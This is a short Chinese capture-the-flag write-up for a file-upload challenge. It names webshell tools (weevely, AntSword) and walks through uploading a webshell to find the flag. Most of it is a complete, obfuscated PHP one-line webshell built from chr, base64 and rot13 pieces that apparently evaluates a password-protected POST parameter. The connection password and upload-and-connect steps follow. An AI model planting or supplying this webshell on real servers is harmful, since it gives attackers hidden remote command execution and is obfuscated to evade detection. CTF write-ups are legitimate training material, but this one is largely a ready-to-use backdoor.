题目
思路
- 上传一句话木马,获取shell
工具
1、weevely,kali自带,可以生成一句话木马
2、中国蚁剑 https://github.com/AntSwordProject/antSword
windows下图形化的软件,下载安装都容易,升级版的中国菜刀
解法
1、用中国蚁剑里的插件做的一句话木马 名字是 生成shell
2、安装完后生成
3、非常高级
<?php // 使用时请删除此行, 连接密码: amNtMUqc ?>
<?php $hgey=create_function(chr(31536/876).chr(0646-0463).chr(01531-01352).base64_decode('bQ==').str_rot13('r'),chr(0175666/01176).chr(738-620).base64_decode('YQ==').base64_decode('bA==').chr(01641-01571).chr(20196/561).chr(0407-0224).str_rot13('b').chr(98100/900).chr(0x220-0x1bb).base64_decode('KQ==').base64_decode('Ow=='));$hgey(base64_decode('OTIzO'.'DU1O0'.'BldkF'.'sKCRf'.''.chr(909-824).chr(0163375/01531).chr(0x15a-0x121).str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').str_rot13('g').chr(231-127).str_rot13('o').base64_decode('VQ==').''.'50TVV'.'xY10p'.'OzI3N'.'zE1Nj'.'U7'.''));?>
4、没有验证就很简单了,直接保存到文本里,后缀改.php,上传就可以了
5、填入地址,填入密码
6、然后就能执行shell,查看目录,上一层目录找一下就有了
